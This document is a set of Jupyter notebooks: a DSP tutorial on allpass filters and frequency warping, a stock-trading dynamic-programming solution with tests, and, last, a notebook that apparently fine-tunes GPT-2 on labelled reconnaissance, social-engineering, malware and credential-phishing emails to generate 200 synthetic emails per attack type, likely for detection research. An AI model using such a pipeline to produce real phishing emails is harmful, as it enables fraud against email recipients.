ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
plt.xlabel('Re', horizontalalignment='right', x=1.0)
plt.ylabel('Im', y=1.0)
plt.title('Complex z-Plane', loc='right')
plt.grid()
plt.plot(np.real(A),np.imag(A),'rx')
plt.plot(np.real(B),np.imag(B),'bo')
a=0.5; #Pole location
B=[1/a.conjugate()]; #the zero location
A=[a];
zplane(B,A); #plot the pole/zero diagram with axis limits
###Output
_____no_output_____
###Markdown
In this plot, the cross at 0.5 is the pole, and the circle at 2 is the zero. How can we see that the magnitude of the frequency response $H(e^{j \cdot \Omega})$ is 1? We can re-write it as$$\large H_{ap}(e^{j \Omega})=\frac{e^{-j \Omega} -\bar{ a}} {1 -a e^{-j \Omega}}=e^{-j \Omega}\frac{1 -\bar {a} e^{j \Omega}} {1 -a e^{-j \Omega}}$$Here you can see that the expression in the numerator is the **complex conjugate** of the denominator, hence their **magnitudes** cancel to **one**. The exponential before the fraction also has magnitude 1, hence the entire expression has magnitude 1,$$\large \mid{H_{ap}(e^{j\Omega})}\mid=1$$Here we can see that, using just one pole and one zero, we can obtain a magnitude of constant 1. More interesting now is the resulting phase. The phase function can be found in the book Oppenheim/Schafer, “Discrete Time Signal Processing”:$$\large \phi(\Omega)=- \Omega - 2 arctan \left(\frac{r sin(\Omega-\theta)} {1 - r cos(\Omega-\theta)} \right)$$ where r is the magnitude of a and $\theta$ is the phase angle of a (hence $a=r\cdot e^{j \theta}$). Observe that so far we assumed the phase to depend linearly on the frequency ($\phi(\Omega)=-\Omega \cdot d$), and here we see it to be quite non-linear, with the trigonometric functions! We can now plot the resulting phase over the normalized frequency, and compare it with the phase of a delay of 1 sample (of $z^{-1}$), where we get $\phi(\Omega)=-\Omega$. This can be seen in the following plot, for $a=0.5$ and $a=-0.5$:
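This phase formula can be cross-checked numerically against `freqz`; a small sketch for a real example coefficient (for this choice of $a$ no phase wrapping occurs over $[0,\pi)$):

```python
import numpy as np
from scipy.signal import freqz

a = 0.5
r, theta = np.abs(a), np.angle(a)
w, H = freqz([-np.conj(a), 1.0], [1.0, -a], worN=512)
phi_formula = -w - 2 * np.arctan2(r * np.sin(w - theta), 1.0 - r * np.cos(w - theta))
print(np.allclose(phi_formula, np.angle(H)))    # True
```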
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/Mbk8-zRg-9o" frameborder="0" allow="accelerometer;
encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
# For Google Colab
import sys
if 'google.colab' in sys.modules:
!pip install matplotlib==3.1.3
from sympy import symbols, I , E, conjugate, Abs
from sympy.functions import arg
from sympy.plotting import plot
a = symbols('a', complex=True)
omega, r = symbols('\Omega r', real=True)
Hap=(E**(-I*omega)-conjugate(a))/(1-a*E**(-I*omega))
print('Hap=')
display(Hap)
print('Magnitude=')
display(Abs(Hap))
print('For a = 0.5, |Hap| =')
display(Abs(Hap.subs(a,-0.5)))
print('Phase:')
phase=arg(Hap.subs(a,r*E**(I*omega)))
p = plot(arg(Hap.subs(a,-0.5)),arg(Hap.subs(a,0)),arg(Hap.subs(a,0.5)), (omega,0,np.pi), show = False, legend = True)
p[0].line_color = 'green'
p[0].label = 'a=- 0.5'
p[1].line_color = 'red'
p[1].label = 'a=0'
p[2].line_color = 'blue'
p[2].label = 'a=0.5'
p.show()
###Output
Hap=
###Markdown
Here, the blue line is the allpass phase for a=0.5, the green line for a=-0.5, and the red line is for a=0, the phase of a pure 1 sample delay $z^{-1}$. Here it can be seen that the beginning and end of the curves are identical (at frequencies 0 and pi), and only in between does the allpass phase deviate from the 1 sample delay! For a=0 the allpass indeed becomes identical to $z^{-1}$, a delay of 1 sample. So we can see that it behaves very **similarly to a delay**. Such an IIR allpass filter can also be used to implement **fractional delays**. In the above plot, observe the different **slopes** or **derivatives** of the phase function with respect to frequency, which show different **group delays** for different coefficients a. For instance the green curve for a=-0.5, at frequencies below about half the Nyquist frequency, has a slope which is about a third of the slope of the red curve for a delay of 1 sample, and hence represents a fractional delay. This application is described in more detail e.g. in: T. I. Laakso, V. Välimäki, M. Karjalainen, and U. K. Laine. Splitting the unit delay. IEEE Signal Processing Magazine, 13(1):30–60, January 1996.
###Code
%%html
<iframe src='https://ieeexplore.ieee.org/document/482137', width=800, height=400></iframe>
###Output
_____no_output_____
###Markdown
Frequency Warping
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/EH6UWE7sauI" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
###Output
_____no_output_____
###Markdown
For a=0.5 (the blue curve) we observe a **“stretching”** of the low frequency range, where a small part of the low frequencies stretches over a wider phase range than in the other curves. For the frequency warping we will interpret the negative phase as a normalized frequency. The plot can also be produced with a simple Python function for the phase function:
###Code
def warpingphase(w, a):
#produces (outputs) phase wy for an allpass filter
#w: input vector of normlized frequencies (0..pi)
#a: allpass coefficient
#phase of allpass zero/pole :
theta = np.angle(a);
#magnitude of allpass zero/pole :
r = np.abs(a);
wy = -w-2*np.arctan((r*np.sin(w-theta))/(1-r*np.cos(w-theta)));
return wy
w=np.arange(0,3.14,0.01)
plt.figure()
plt.plot(w,warpingphase(w,0.5))
plt.plot(w,warpingphase(w,0))
plt.plot(w,warpingphase(w,-0.5))
plt.grid()
plt.xlabel('Normalized Frequency')
plt.ylabel('Phase Angle');
###Output
_____no_output_____
###Markdown
The **phase** at the output of our phase function can also be **interpreted as a normalized frequency**. This means its **output** can be the **input** of another warpingphase function. An interesting observation is that the warpingphase function with coefficient $-\bar{a}$ is the inverse of the warpingphase function with coefficient $a$! We can try this in Python:
###Code
import matplotlib.pyplot as plt
#from warpingphase import *
#frequency range:
w = np.arange(0,np.pi, 0.01)
a = 0.5 * (1+1j)
wyy = (warpingphase(warpingphase(w,a), -a.conjugate()))
plt.figure()
plt.plot(w,wyy)
plt.xlabel('Normalized Frequency')
plt.ylabel('Phase Angle')
plt.show()
###Output
_____no_output_____
###Markdown
Here we see that it is indeed the **identity** function. This shows that, interpreting the allpass as a normalized frequency “warper”, the allpass with coefficient $a$ is inverse to the allpass with $-\bar{a}$. What is the frequency response of an example allpass filter? For $a=0.5$, we can use ```freqz```. There we expect to see the magnitude to be a constant 1, and the phase angle as we saw from our phase formula from Oppenheim/Schafer (eq. 1). This also allows “cross-checking” the results! Looking at the z-transform: $$\large H_{ap}(z)=\frac{z^{-1} -\bar{ a} } {1 -a z^{-1}} $$we get our coefficient vectors as `a=0.5; B=[-a.conjugate(), 1]; A=[1, -a];` (observe that for freqz the higher exponents of $z^{-1}$ appear to the right). Now we plot the frequency response and impulse response:
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/fDjerT8uCvU" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
a=0.5;
B=[-a.conjugate(), 1];
A=[1, -a];
# Frequency Response
from scipy.signal import freqz
import numpy as np
from matplotlib.ticker import FuncFormatter, MultipleLocator
w, h_response = freqz(B,A)
fig=plt.figure(figsize=(10,8))
fig.suptitle('Frequency Response', fontsize=16)
plt.subplot(2,1,1)
plt.plot(w/np.pi, 20 * np.log10(abs(h_response)), 'b')
#plt.ylim((-0.001,0.001))
plt.ylabel('Amplitude (dB)')
plt.xlabel('Normalized Frequency')
plt.grid()
ax = plt.gca()
ax.xaxis.set_major_formatter(FuncFormatter(
lambda val,pos: '{:.0g}$\pi$'.format(val) if val !=0 else '0'
))
ax.xaxis.set_major_locator(MultipleLocator(base=0.2))
plt.subplot(2,1,2)
angles = np.angle(h_response)
plt.plot(w/np.pi, angles, 'g')
plt.ylabel('Angle (radians)')
plt.xlabel('Normalized Frequency')
ax = plt.gca()
ax.xaxis.set_major_formatter(FuncFormatter(
lambda val,pos: '{:.0g}$\pi$'.format(val) if val !=0 else '0'
))
ax.xaxis.set_major_locator(MultipleLocator(base=0.2))
plt.grid()
###Output
_____no_output_____
###Markdown
Here we can see in the above plot of the magnitude that we indeed obtain a constant 1 (which is 0 dB; the 2e-15 comes from the finite accuracy and rounding errors), and that we have the **non-linear** phase in the lower plot, as in the phase plots before. To obtain the impulse response, we can use the function “lfilter” and input a unit impulse into it.
###Code
from scipy import signal as sp
Imp = np.zeros(21)
Imp[0] = 1
h = sp.lfilter(B, A, Imp)
plt.figure(figsize=(8,6))
plt.plot(h)
plt.title('Impulse Response of our IIR Allpass with a=0.5')
plt.xlabel('Sample')
plt.ylabel('Value')
plt.grid()
###Output
_____no_output_____
###Markdown
Here we can see that the first, non-delayed sample is not zero, but -0.5. This can also be seen by printing the first 4 elements of our impulse response: `print(h[0:4])` gives `[-0.5 0.75 0.375 0.1875]`. The second element corresponds to the delay of 1 sample, our $z^{-1}$, with a factor of 0.75. But then there are more samples, going back into the past, exponentially decaying. This means that not only the previous sample goes into our filtering calculation, but also samples further in the past, and even the **non-delayed** sample, with a factor of -0.5. This is actually a problem for the so-called frequency warping (next section), if we want to use frequency warping in IIR filters, because here we would get delay-less loops, which are difficult to implement! (With **FIR filters** this is **no problem** though) Frequency Warping These properties of the allpass can now be used to “warp” the frequency scale of a filter (by effectively replacing $e^{j\Omega} \leftarrow e^{j\phi (\Omega)}$ in our frequency response), for instance to map it according to the so-called **Bark scale**, used in psycho-acoustics. A common approximation of the Bark scale is$$\large Bark=13 \cdot arctan(0.00076 \cdot f) + 3.5 \cdot arctan\left(\left(\dfrac{f}{7500}\right)^2\right)$$(from Wikipedia, Bark scale; the approximation goes back to Zwicker and Terhardt), where f is the frequency in Hz. The Bark scale can be seen as an approximation of the changing frequency resolution over frequency of the inner ear filters of the human ear's cochlea. Because of the structure of our cochlea, the ear has different sensitivities for different frequencies and different signals. The signal dependent threshold of audibility of the ear is called the **Masking Threshold**. It has more spectral detail at lower than at higher frequencies, according to the Bark scale. We can plot the Bark formula using Python:
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/-toXcoqWHRE" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
#Frequency array between 0 and 20000 Hz in 1000 steps:
f=np.linspace(0,20000,1000)
#Computation of Zwickers Bark approximation formula:
z=13*np.arctan(0.00076*f)+3.5*np.arctan((f/7500.0)**2)
#plot Bark over Hertz:
plt.figure(figsize=(8,6))
plt.plot(f,z)
plt.xlabel('Frequency in Hertz')
plt.ylabel('Frequency in Bark')
plt.title('Zwicker&Terhard Approximation')
plt.grid()
###Output
_____no_output_____
###Markdown
Here we can see that 1 Bark at lower frequencies corresponds to a much smaller bandwidth than at higher frequencies. This means the ear can be seen as having a higher frequency resolution at lower frequencies than at higher frequencies. Imagine we want to **design a filter** or system for **hearing purposes**; for instance, we would like to model the masking threshold of the ear for any given signal by some linear filter (FIR or IIR). Then it would be useful to give this filter a **higher frequency resolution at lower frequencies**, such that it matches the smaller details of the **masking threshold** at lower frequencies. But if we look at the **usual design methods**, they distribute the filter **details independent of the frequency range** (for instance what we saw with the remez method, where we have equally distributed ripples). Here we can now use frequency warping, such that we **enlarge the low frequency range** and shrink the high frequency range accordingly, such that our filter now works on the **warped frequency** and **“sees”** the **lower frequencies in more detail**; the lower frequencies are more spread out in comparison to the higher frequencies. **How do we do this?** For some frequency response $H(e^{j\Omega})$ we would like to warp the frequency $\Omega$ with some function $\phi(\Omega)$ according to our desired frequency scale, such that we get$$\large H(e^{j\cdot \phi (\Omega)})$$But this is exactly the principle of an **allpass filter**, which has the frequency response$$\large H_{ap}(e^{j \Omega})=e^{j \cdot \phi_{ap}(\Omega)}$$ Usually we would like to map positive frequencies again to positive frequencies, and we saw that $\phi_{ap}(\Omega)$ becomes negative, hence we take the approach to **replace z** in the argument of our transfer function with the reverse of our **allpass** transfer function:$$\large z^{-1}\leftarrow H_{ap}(a,z)$$This replaces all delays of the filter to be warped by our allpass filter. In this way we replace our linear function on the unit circle in z with the non-linear, warped function on the unit circle $H_{ap}$. Hence we get the warped transfer function as:$$\large H_{warped}(z)=H(H_{ap}( a,z)^{-1})$$and the resulting frequency response becomes:$$\large H_{warped}(e^{j \Omega})=H(e^{-j \cdot \phi_{ap}(\Omega)})$$Here we can now see that we obtained the **desired frequency warping.** What does this mean for the filter implementation? We know that our FIR filters always consist of many delay elements $z^{-1}$.
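In code, “replacing every delay by an allpass” simply means sending the signal through a growing chain of first-order allpass sections; a minimal sketch for a real warping coefficient (the function name and the values are only illustrative):

```python
import numpy as np
import scipy.signal as sp

def warped_fir(b, a_warp, x):
    """Apply the warped version of the FIR filter b to the signal x (sketch)."""
    y = b[0] * x
    xm = np.copy(x)
    for m in range(1, len(b)):
        # one more allpass stage: H_ap(z) = (z^{-1} - a) / (1 - a z^{-1})
        xm = sp.lfilter([-a_warp, 1.0], [1.0, -a_warp], xm)
        y = y + b[m] * xm
    return y

x = np.random.randn(64)
y = warped_fir(np.ones(4) / 4, 0.5, x)   # warped 4-tap moving average
```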
###Code
%%html
<iframe width="560" height="315" src="https://www.youtube.com/embed/2arqHPweD5I" frameborder="0" allow="accelerometer; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
###Output
_____no_output_____
###Markdown
**Example:** Take an FIR filter,$$\large H(z)= {\sum _{m=0} ^ L b(m) \cdot z^{-m}} $$its warped version is:$$\large H(H_{ap}(a,z)^{-1})= {\sum_ {m=0} ^ L b(m) \cdot H^{m}_{ap}(a,z)} $$To obtain a desired filter, we now first have to **warp our desired filter**, and then **design** our filter in the **warped domain**. Observe that the warping turns an **FIR filter into an IIR filter**, because the allpass has poles outside of zero. An example of this kind of design can be seen in the following picture (from [1]). Here we can see that the 12th order filter successfully approximated the more detailed curve at low frequencies, using the warping approach. - [1] Julius O. Smith and Jonathan S. Abel, “Bark and ERB Bilinear Transforms,” IEEE Transactions on Speech and Audio Processing, vol. 7, no. 6, pp. 697 – 708, November 1999. - [2] S. Wabnik, G. Schuller, U. Kraemer, J. Hirschfeld: "Frequency Warping in Low Delay Audio Coding", IEEE International Conference on Acoustics, Speech, and Signal Processing, Philadelphia, PA, March 18–23, 2005
###Code
###Output
_____no_output_____ |
recursion_dynamic/max_profit_k/max_profit_solution.ipynb | ###Markdown
This notebook was prepared by [Donne Martin](https://github.com/donnemartin). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges). Solution Notebook Problem: Given a list of stock prices on each consecutive day, determine the max profits with k transactions.* [Constraints](Constraints)* [Test Cases](Test-Cases)* [Algorithm](Algorithm)* [Code](Code)* [Unit Test](Unit-Test) Constraints* Is k the number of sell transactions? * Yes* Can we assume the prices input is an array of ints? * Yes* Can we assume the inputs are valid? * No* If the prices are all decreasing and there is no opportunity to make a profit, do we just return 0? * Yes* Should the output be the max profit and days to buy and sell? * Yes* Can we assume this fits memory? * Yes Test Cases* Prices: None or k: None -> None* Prices: [] or k []* Prices: [0, -1, -2, -3, -4, -5] * (max profit, list of transactions) * (0, [])* Prices: [2, 5, 7, 1, 4, 3, 1, 3] k: 3 * (max profit, list of transactions) * (10, [Type.SELL day: 7 price: 3, Type.BUY day: 6 price: 1, Type.SELL day: 4 price: 4, Type.BUY day: 3 price: 1, Type.SELL day: 2 price: 7, Type.BUY day: 0 price: 2]) AlgorithmWe'll use bottom up dynamic programming to build a table.The rows (i) represent the prices.The columns (j) represent the number of transactions (k).T[i][j] = max(T[i][j - 1], prices[j] - price[m] + T[i - 1][m])m = 0...j-1 0 1 2 3 4 5 6 7--------------------------------------| | 2 | 5 | 7 | 1 | 4 | 3 | 1 | 3 |--------------------------------------| 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 || 1 | 0 | 3 | 5 | 5 | 5 | 5 | 5 | 5 || 2 | 0 | 3 | 5 | 5 | 8 | 8 | 8 | 8 || 3 | 0 | 3 | 5 | 5 | 8 | 8 | 8 | 10 |--------------------------------------Optimization:max_diff = max(max_diff, T[i - 1][j - 1] - prices[j - 1])T[i][j] = max(T[i][j - 1], prices[j] + max_diff)Complexity:* Time: O(n * k)* Space: O(n * k) Code
###Code
from enum import Enum # Python 2 users: Run pip install enum34
class Type(Enum):
SELL = 0
BUY = 1
class Transaction(object):
def __init__(self, type, day, price):
self.type = type
self.day = day
self.price = price
def __eq__(self, other):
return self.type == other.type and \
self.day == other.day and \
self.price == other.price
def __repr__(self):
return str(self.type) + ' day: ' + \
str(self.day) + ' price: ' + \
str(self.price)
import sys
class StockTrader(object):
def find_max_profit(self, prices, k):
if prices is None or k is None:
raise TypeError('prices or k cannot be None')
if not prices or k <= 0:
return []
num_rows = k + 1 # 0th transaction for dp table
num_cols = len(prices)
T = [[None] * num_cols for _ in range(num_rows)]
for i in range(num_rows):
for j in range(num_cols):
if i == 0 or j == 0:
T[i][j] = 0
continue
max_profit = -sys.maxsize
for m in range(j):
profit = prices[j] - prices[m] + T[i - 1][m]
if profit > max_profit:
max_profit = profit
T[i][j] = max(T[i][j - 1], max_profit)
return self._find_max_profit_transactions(T, prices)
def find_max_profit_optimized(self, prices, k):
if prices is None or k is None:
raise TypeError('prices or k cannot be None')
if not prices or k <= 0:
return []
num_rows = k + 1
num_cols = len(prices)
T = [[None] * num_cols for _ in range(num_rows)]
for i in range(num_rows):
max_diff = prices[0] * -1
for j in range(num_cols):
if i == 0 or j == 0:
T[i][j] = 0
continue
max_diff = max(
max_diff,
T[i - 1][j - 1] - prices[j - 1])
T[i][j] = max(
T[i][j - 1],
prices[j] + max_diff)
return self._find_max_profit_transactions(T, prices)
def _find_max_profit_transactions(self, T, prices):
results = []
i = len(T) - 1
j = len(T[0]) - 1
max_profit = T[i][j]
while i != 0 and j != 0:
if T[i][j] == T[i][j - 1]:
j -= 1
else:
sell_price = prices[j]
results.append(Transaction(Type.SELL, j, sell_price))
profit = T[i][j] - T[i - 1][j - 1]
i -= 1
j -= 1
for m in range(j + 1)[::-1]:
if sell_price - prices[m] == profit:
results.append(Transaction(Type.BUY, m, prices[m]))
break
return (max_profit, results)
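# Example usage (a sketch; it mirrors the unit test further below):
# trader = StockTrader()
# profit, transactions = trader.find_max_profit([2, 5, 7, 1, 4, 3, 1, 3], 3)
# profit == 10, and transactions holds the corresponding buy/sell days.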
###Output
_____no_output_____
###Markdown
Unit Test
###Code
%%writefile test_max_profit.py
from nose.tools import assert_equal
from nose.tools import assert_raises
from nose.tools import assert_true
class TestMaxProfit(object):
def test_max_profit(self):
stock_trader = StockTrader()
assert_raises(TypeError, stock_trader.find_max_profit, None, None)
assert_equal(stock_trader.find_max_profit(prices=[], k=0), [])
prices = [5, 4, 3, 2, 1]
k = 3
assert_equal(stock_trader.find_max_profit(prices, k), (0, []))
prices = [2, 5, 7, 1, 4, 3, 1, 3]
profit, transactions = stock_trader.find_max_profit(prices, k)
assert_equal(profit, 10)
assert_true(Transaction(Type.SELL,
day=7,
price=3) in transactions)
assert_true(Transaction(Type.BUY,
day=6,
price=1) in transactions)
assert_true(Transaction(Type.SELL,
day=4,
price=4) in transactions)
assert_true(Transaction(Type.BUY,
day=3,
price=1) in transactions)
assert_true(Transaction(Type.SELL,
day=2,
price=7) in transactions)
assert_true(Transaction(Type.BUY,
day=0,
price=2) in transactions)
print('Success: test_max_profit')
def main():
test = TestMaxProfit()
test.test_max_profit()
if __name__ == '__main__':
main()
%run -i test_max_profit.py
###Output
Success: test_max_profit
###Markdown
This notebook was prepared by [Donne Martin](https://github.com/donnemartin). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges). Solution Notebook Problem: Given a list of stock prices on each consecutive day, determine the max profits with k transactions.* [Constraints](Constraints)* [Test Cases](Test-Cases)* [Algorithm](Algorithm)* [Code](Code)* [Unit Test](Unit-Test) Constraints* Is k the number of sell transactions? * Yes* Can we assume the prices input is an array of ints? * Yes* Can we assume the inputs are valid? * No* If the prices are all decreasing and there is no opportunity to make a profit, do we just return 0? * Yes* Should the output be the max profit and days to buy and sell? * Yes* Can we assume this fits memory? * Yes Test Cases* Prices: None or k: None -> None* Prices: [] or k []* Prices: [0, -1, -2, -3, -4, -5] * (max profit, list of transactions) * (0, [])* Prices: [2, 5, 7, 1, 4, 3, 1, 3] k: 3 * (max profit, list of transactions) * (10, [Type.SELL day: 7 price: 3, Type.BUY day: 6 price: 1, Type.SELL day: 4 price: 4, Type.BUY day: 3 price: 1, Type.SELL day: 2 price: 7, Type.BUY day: 0 price: 2]) AlgorithmWe'll use bottom up dynamic programming to build a table.The rows (i) represent the prices.The columns (j) represent the number of transactions (k).T[i][j] = max(T[i][j - 1], prices[j] - price[m] + T[i - 1][m])m = 0...j-1 0 1 2 3 4 5 6 7--------------------------------------| | 2 | 5 | 7 | 1 | 4 | 3 | 1 | 3 |--------------------------------------| 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 || 1 | 0 | 3 | 5 | 5 | 5 | 5 | 5 | 5 || 2 | 0 | 3 | 5 | 5 | 8 | 8 | 8 | 8 || 3 | 0 | 3 | 5 | 5 | 8 | 8 | 8 | 10 |--------------------------------------Optimization:max_diff = max(max_diff, T[i - 1][j - 1] - prices[j - 1])T[i][j] = max(T[i][j - 1], prices[j] + max_diff)Complexity:* Time: O(n * k)* Space: O(n * k) Code
###Code
from enum import Enum # Python 2 users: Run pip install enum34
class Type(Enum):
SELL = 0
BUY = 1
class Transaction(object):
def __init__(self, type, day, price):
self.type = type
self.day = day
self.price = price
def __eq__(self, other):
return self.type == other.type and \
self.day == other.day and \
self.price == other.price
def __repr__(self):
return str(self.type) + ' day: ' + \
str(self.day) + ' price: ' + \
str(self.price)
import sys
class StockTrader(object):
def find_max_profit(self, prices, k):
if prices is None or k is None:
raise TypeError('prices or k cannot be None')
if not prices or k <= 0:
return []
num_rows = k + 1 # 0th transaction for dp table
num_cols = len(prices)
T = [[None] * num_cols for _ in range(num_rows)]
for i in range(num_rows):
for j in range(num_cols):
if i == 0 or j == 0:
T[i][j] = 0
continue
max_profit = -sys.maxsize
for m in range(j):
profit = prices[j] - prices[m] + T[i - 1][m]
if profit > max_profit:
max_profit = profit
T[i][j] = max(T[i][j - 1], max_profit)
return self._find_max_profit_transactions(T, prices)
def find_max_profit_optimized(self, prices, k):
if prices is None or k is None:
raise TypeError('prices or k cannot be None')
if not prices or k <= 0:
return []
num_rows = k + 1
num_cols = len(prices)
T = [[None] * num_cols for _ in range(num_rows)]
for i in range(num_rows):
max_diff = prices[0] * -1
for j in range(num_cols):
if i == 0 or j == 0:
T[i][j] = 0
continue
max_diff = max(
max_diff,
T[i - 1][j - 1] - prices[j - 1])
T[i][j] = max(
T[i][j - 1],
prices[j] + max_diff)
return self._find_max_profit_transactions(T, prices)
def _find_max_profit_transactions(self, T, prices):
results = []
i = len(T) - 1
j = len(T[0]) - 1
max_profit = T[i][j]
while i != 0 and j != 0:
if T[i][j] == T[i][j - 1]:
j -= 1
else:
sell_price = prices[j]
results.append(Transaction(Type.SELL, j, sell_price))
profit = T[i][j] - T[i - 1][j - 1]
i -= 1
j -= 1
for m in range(j + 1)[::-1]:
if sell_price - prices[m] == profit:
results.append(Transaction(Type.BUY, m, prices[m]))
break
return (max_profit, results)
###Output
_____no_output_____
###Markdown
Unit Test
###Code
%%writefile test_max_profit.py
import unittest
class TestMaxProfit(unittest.TestCase):
def test_max_profit(self):
stock_trader = StockTrader()
self.assertRaises(TypeError, stock_trader.find_max_profit, None, None)
self.assertEqual(stock_trader.find_max_profit(prices=[], k=0), [])
prices = [5, 4, 3, 2, 1]
k = 3
self.assertEqual(stock_trader.find_max_profit(prices, k), (0, []))
prices = [2, 5, 7, 1, 4, 3, 1, 3]
profit, transactions = stock_trader.find_max_profit(prices, k)
self.assertEqual(profit, 10)
self.assertTrue(Transaction(Type.SELL,
day=7,
price=3) in transactions)
self.assertTrue(Transaction(Type.BUY,
day=6,
price=1) in transactions)
self.assertTrue(Transaction(Type.SELL,
day=4,
price=4) in transactions)
self.assertTrue(Transaction(Type.BUY,
day=3,
price=1) in transactions)
self.assertTrue(Transaction(Type.SELL,
day=2,
price=7) in transactions)
self.assertTrue(Transaction(Type.BUY,
day=0,
price=2) in transactions)
print('Success: test_max_profit')
def main():
test = TestMaxProfit()
test.test_max_profit()
if __name__ == '__main__':
main()
%run -i test_max_profit.py
###Output
Success: test_max_profit
|
Sessions/Session10/Day5/model_selection/howto.ipynb | ###Markdown
This notebook is developed as part of the [KIPAC/StatisticalMethods course](https://github.com/KIPAC/StatisticalMethods), (c) 2019 Adam Mantz, licensed under the GPLv2. What's the deal with REPLACE_WITH_YOUR_SOLUTION?Tutorial notebooks from [KIPAC/StatisticalMethods](https://github.com/KIPAC/StatisticalMethods) will all start with these definitions:
###Code
class SolutionMissingError(Exception):
def __init__(self):
Exception.__init__(self,"You need to complete the solution for this code to work!")
def REPLACE_WITH_YOUR_SOLUTION():
raise SolutionMissingError
REMOVE_THIS_LINE = REPLACE_WITH_YOUR_SOLUTION
###Output
_____no_output_____
###Markdown
You'll then see cells that look something like this:
###Code
# Set x equal to something
try:
exec(open('solutions/setx.py').read())
except IOError:
x = REPLACE_WITH_YOUR_SOLUTION()
###Output
_____no_output_____
###Markdown
Go ahead and try to run it. You'll get an error traceback, the end of which points out that you've neglected to provide a solution to the posed problem. This is our preferred method of providing incomplete code, since an alternative like```pythonx = set x equal to something```will throw a different and less informative error if you accidentally run the cell before completing it. The `try`-`except` wrapper is there so that we, the developers, can easily verify that the entire notebook runs if provided with a correct solution. There is no need for you to write solutions for each cell in separate files, and doing so will just make this notebook harder for you to use later. Instead, we suggest removing the `try`-`except` construction entirely, so your completed notebook cell would look like
###Code
# Set x equal to something
x = 5.0
###Output
_____no_output_____
###Markdown
You'll also see cells in this format:
###Code
# Define a function that does stuff
try:
exec(open('solutions/func.py').read())
except IOError:
REMOVE_THIS_LINE()
def myfunc(a, b):
c = REPLACE_WITH_YOUR_SOLUTION()
return REPLACE_WITH_YOUR_SOLUTION()
###Output
_____no_output_____ |
notebooks/4.ipynb | ###Markdown
Text Generation To use gpt2, Python version 3.7 or below is required. To install, use: `pip install tensorflow==1.15`. Don't forget to switch the kernel before running.
###Code
import gpt_2_simple as gpt2
import os
import requests
import pandas as pd
from tqdm.notebook import tqdm
###Output
WARNING:tensorflow:
The TensorFlow contrib module will not be included in TensorFlow 2.0.
For more information, please see:
* https://github.com/tensorflow/community/blob/master/rfcs/20180907-contrib-sunset.md
* https://github.com/tensorflow/addons
* https://github.com/tensorflow/io (for I/O related ops)
If you depend on functionality not listed there, please file an issue.
###Markdown
Download the model
###Code
model_name = "124M"
if not os.path.isdir(os.path.join("Downloads","models", model_name)):
print(f"Downloading {model_name} model...")
gpt2.download_gpt2(model_dir='Downloads/models', model_name=model_name) # model is saved into current directory under /models/124M/
###Output
Downloading 124M model...
###Markdown
Input Email TTR'ed Dataset
###Code
def grt_txt(file_name,model_name,savepath):
sess = gpt2.start_tf_sess()
gpt2.finetune(sess,
file_name,
model_name=model_name,
model_dir='Downloads/models',
steps=20) # steps is max number of training steps
# Take too much time for large number of steps... Can use 1 to 1000.
for i in tqdm(range(200)):
single_text = gpt2.generate(sess, return_as_list=True)
with open(f'{savepath}/{i}.txt','w') as file:
file.write(single_text[0])
df = pd.read_csv('../data/additional-features-v2/new/additional_features_TTR.tsv',sep='\t')
# text = grt_txt("../tests/test.txt", '124M')
# len(text)
###Output
_____no_output_____
###Markdown
This part gets the first 200 emails of each type of attack.
###Code
df.columns
types = df[['reconnaissance','social_engineering','malware','credential_phishing']]
types
value1 = types[types.sum(axis=1)==1]
###Output
_____no_output_____
###Markdown
Reconnaissance
###Code
value2_r = types[(types['reconnaissance']==1) & (types.sum(axis=1)==2)]
R1_index = value1[value1['reconnaissance']==1].index
R_list = []
for i in R1_index:
R_list.append(i)
R2_index = value2_r.index
temp = 0
while len(R_list)< 200:
R_list.append(R2_index[temp])
temp += 1
len(R_list)
# R_list is the index of emails with attack reconnaissance
R_txt = df["TTR'ed Text"].loc[R_list]
###Output
_____no_output_____
###Markdown
Social Engineering
###Code
S1_index = value1[value1['social_engineering']==1].index
S_list = []
for i in range(200):
S_list.append(S1_index[i])
len(S_list)
S_txt = df["TTR'ed Text"].loc[S_list]
###Output
_____no_output_____
###Markdown
Malware
###Code
M1_index = value1[value1['malware']==1].index
value2_m = types[(types['malware']==1) & (types.sum(axis=1)==2)]
value3_m = types[(types['malware']==1) & (types.sum(axis=1)==3)]
M_list = []
for i in M1_index:
M_list.append(i)
for j in value2_m.index:
M_list.append(j)
for k in value3_m.index:
if len(M_list) < 200:
M_list.append(k)
else:
break
len(M_list)
M_txt = df["TTR'ed Text"].loc[M_list]
###Output
_____no_output_____
###Markdown
Credential Phishing
###Code
C1_index = value1[value1['credential_phishing']==1].index
C_list = []
for i in C1_index:
if len(C_list)<200:
C_list.append(i)
len(C_list)
C_txt = df["TTR'ed Text"].loc[C_list]
###Output
_____no_output_____
###Markdown
Create email txt files for each attack type. Delete the existing txt files before re-running these cells.
###Code
attack=['reconnaissance','social_engineering','malware','credential_phishing']
# Reconnaissance
# with open(f'../data/additional-features-v2/new/attack_Text/reconnaissance.txt','a+') as f:
# for i in R_txt:
# f.write(i)
# Social Engineering
# with open(f'../data/additional-features-v2/new/attack_Text/social_engineering.txt','a+') as f:
# for i in S_txt:
# f.write(i)
# Malware
# with open(f'../data/additional-features-v2/new/attack_Text/malware.txt','a+') as f:
# for i in M_txt:
# f.write(i)
# # Credential_phishing
# with open(f'../data/additional-features-v2/new/attack_Text/Credential_phishing.txt','a+') as f:
# for i in C_txt:
# f.write(i)
###Output
_____no_output_____
###Markdown
Text generating
###Code
grt_txt("../data/additional-features-v2/new/attack_Text/reconnaissance.txt", '124M','../data/additional-features-v2/new/Generated_text/Reconnaissance/')
